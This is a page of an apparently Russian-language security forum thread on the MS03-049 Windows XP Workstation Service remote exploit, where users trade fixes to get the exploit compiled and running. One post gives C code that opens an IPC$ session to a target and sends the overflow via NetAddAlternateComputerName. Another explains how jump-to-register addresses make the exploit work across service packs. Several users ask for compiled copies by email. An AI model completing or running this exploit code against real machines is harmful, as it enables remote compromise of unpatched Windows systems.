Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 3 4 5 6 7 ... 11 След.
RSS
Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)
 
Цитата
Victor пишет:
 
Цитата
Virtual пишет:
как побороть netapi
     hInstance = LoadLibrary("netapi32");
     if (hInstance == NULL)
     {
               fprintf(stderr, "[-] LoadLibrary failed\n");
               exit (1);
     }

     procAddress = (MYPROC)GetProcAddress(hInstance, "NetAddAlternateComputerName"); // up to you to check NetAddAlternateComputerName

\\ а где в шеле номер порта поменять
2abakan
да прав у меня тоже не на всех работает
чаще в ддос отправляет

Попробуй hInstance = LoadLibrary("netapi32.dll");

не подскажите куда именно запихнуть... ?
а то я не в ладах с си. :}
 
Если вы не в ладах с СИ зачем вам экплоит? Что и куда запихнуть можно понять из предыдущих версий wirepair и WKS - сделать загрузку библиотек вместо NetAddAltCompName. А если не соображаете в С ждите пока какой-нибудь ****** выложит kaht3
Скомпиленная версия от wirepair кстати давно есть - практически не на много уступает этому.
 
typedef int (WINAPI * ADDALTCN) (wchar_t*, wchar_t*, void*, void*, long);

HINSTANCE hNetApi;
ADDALTCN fnNetAdd = NULL;

char szNetApi[] = "netapi32.dll";
char szNetAdd[] = "NetAddAlternateComputerName";
// ------------------------------------------------
//void NetAddAlternateComputerName(wchar_t *Server, wchar_t *AlternateName, wchar_t * DomainAccount,
//         &nbs p;         &nbs p;wchar_t *DomainAccountPassword, unsigned int Reserved);

void send_exp(void* dump) {
     NETRESOURCE _IPC_;

     _IPC_.lpLocalName = NULL;
     _IPC_.lpProvider = NULL;
     _IPC_.dwType = RESOURCETYPE_ANY;
     _IPC_.lpRemoteName = (char*)&ipc;
     printf("[+] Setting up IPC$ session...\n");
     if (WNetAddConnection2(&_IPC_,"","",0)!=ERROR_SUCCESS) {
           printf("[x] Couldn't establish IPC$ connection.\n");
           exit (1);
     }
     printf("[*] IPC$ session setup successfully!\n");
     printf("[+] Sending exploit ...\n");
printf("[+] loading '%s' library...\n", szNetApi);
     hNetApi = LoadLibrary(szNetApi);
     if (hNetApi == NULL)
     {
           printf("[-] '%s' not loaded\n", szNetApi);
           //return 1;
     }
     printf("[+] loaded at %p\n", hNetApi);

     printf("[+] locating '%s' function...\n", szNetAdd);
     fnNetAdd = (ADDALTCN) GetProcAddress(hNetApi, szNetAdd);
     if (fnNetAdd == NULL)
     {
           printf("[-] '%s' not found\n", szNetAdd);
           //return 1;
     }
     printf("[+] located at %p\n", fnNetAdd);

     //printf("[+] connecting to '%s'...\n", hostname);
     int stat = fnNetAdd(tgt_net_uni, expl_uni ,NULL,NULL,0);
     printf("[+] sent (status: %d)\n", stat);
     //NetAddAlternateComputerName( );
     //NetAddAlternateComputerName( );
     // ka-a-a b0-0-0-ms //
}
 
зря ты это.. теперь завалят вопросами куда это вставить=)
 
да и куда это вставить ?
P.S. Ржевский  молчать...............
 
НЕ В КОЕМ СЛУЧАЕ НИКУДА НЕ ВСТАВЛЯЙТЕ!!! ЭТО ТРОЯНСКИЙ КОД КОТОРЫЙ ВЫШЛЕТ ВСЕ ВАШИ ПАРОЛИ НА МЫЛО ЗЛОБНОМУ ХАТСКЕРУ И ОТФОРМАТИРУЕТ ВИНЧЕСТЕР!!! Я ПРЕДУПРЕДИЛ И ПОТОМ НЕ ПЛАЧТЕ!!!
 
Цитата
Roger пишет:
НЕ В КОЕМ СЛУЧАЕ НИКУДА НЕ ВСТАВЛЯЙТЕ!!! ЭТО ТРОЯНСКИЙ КОД КОТОРЫЙ ВЫШЛЕТ ВСЕ ВАШИ ПАРОЛИ НА МЫЛО ЗЛОБНОМУ ХАТСКЕРУ И ОТФОРМАТИРУЕТ ВИНЧЕСТЕР!!! Я ПРЕДУПРЕДИЛ И ПОТОМ НЕ ПЛАЧТЕ!!!

)) Прикололся!  [IMG]http://www.securitylab.ru/forum/smileys/smiley4.gif[/IMG]
 
Roger that!!!:)))
 
Вы бы товарищи юмористы лучше б этот эксплоит дополнили таргетами к xp sp0 eng, xp sp1 eng. Для w2k неплохо бы.
Вопрос к знающим, шеллкод в эксплоитах(как вообще, так и в данном случае) универсален, и требуется только подобрать правильный адрес на него, или в шеллкоде тоже зашиты какие-то ОС-зависимые адреса? Второй вопрос, если у разных версий ОС различные адреса, то как пишут универсальные эксплоиты? Ведь управление на шелл передается по адресу который раньше был адресом возврата(в стеке), а стал адресом шелла.
 
abakan
А почему тебе бы самому не разобраться и не добавить?
У того кому нужно уже оно есть - универсальный к xp pro eng sp0/sp1.Для W2k таргета в данном случае никогда не будет, т.к. это уже было разжевано почему именно так.

> шеллкод в эксплоитах(как вообще, так и в данном случае)
> универсален, и требуется только подобрать правильный
> адрес на него, или в шеллкоде тоже зашиты какие-то
> ОС-зависимые адреса?

Адреса подбирать не нужно - нужно разобраться по какому смещению относительно какого-нибуть из регистров будет лежать шеллкод после возврата из уязвимой ф-ции в к-рой происходит переполнение.

> Ведь управление на шелл передается по адресу который
> раньше был адресом возврата(в стеке), а стал адресом
> шелла.

Возврат никогда не происходит прямо на шеллкод - часто, как и в данному случае, он происходит на инструкцию jmp/call esp, jmp /call eax и т.п, к-рые указывают в момент переполнения на шеллкод. А уже адрес этого перехода может зависеть или не зависеть от версии уязвимой программы(если инструкция перехода на шеллкод выбрана в ней) или ОС(если инструкция перехода в одной из библиотек ОС).
Если инструкция перехода находится в библиотеке ОС по одному и тому же адресу в разных версиях SP, то имеем универсальный эксплоит для ОС с любыми SP. Если же инструкция перехода - в коде уязвимой программы, то имеем универсальный эксплоит для семейства ОС, но под конкретную версию уязвимой программы.
 
Nosecret thx !
все исправил ,теперь вопрос параметр -t (0-5) имеет значение ???
 
<font face="Verdana, Arial, Helvetica, sans-serif">Кто занялся партированием на пингвинятинку ?</font>
 
прочитайте это
и портируйте наздоровие хоть под над нанайско-турецкий ZX Spectrum  [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG]
 
Help кто нибудь
Уже всё перепробовал, а _optarg и _getopt всё равно  undefined  [IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]
Подскажите, что с ними делать? ОЧЕНЬ нужно.
а кому не лень - ответьте сюда
 
ОГРОМНАЯ ПРОСЬБА: скиньте откомпиленный эксплоит мне на мыло:      shanker@mail.ru
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Кто-то обещал сделать сплоит с графическим интерфейсом!

Ждем-с!!!
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Отошли мне пожалуста компилированую версию, spaut@yandex.ru
 
Всё ошибки исправил, а как библиотеку gdbm в lcc подключить?
 
Цитата
Shanker пишет:
Кто-то обещал сделать сплоит с графическим интерфейсом!

Ждем-с!!!
зачем сплойт просто оболочку.
у меня уже есть [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG]
 
[/QUOTE] зачем сплойт просто оболочку.
у меня уже есть [IMG]http://www.securitylab.ru/forum/smileys/smiley1.gif[/IMG] [/QUOTE]
Может, поделишься?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Страницы: Пред. 1 ... 3 4 5 6 7 ... 11 След.
Читают тему (гостей: 1)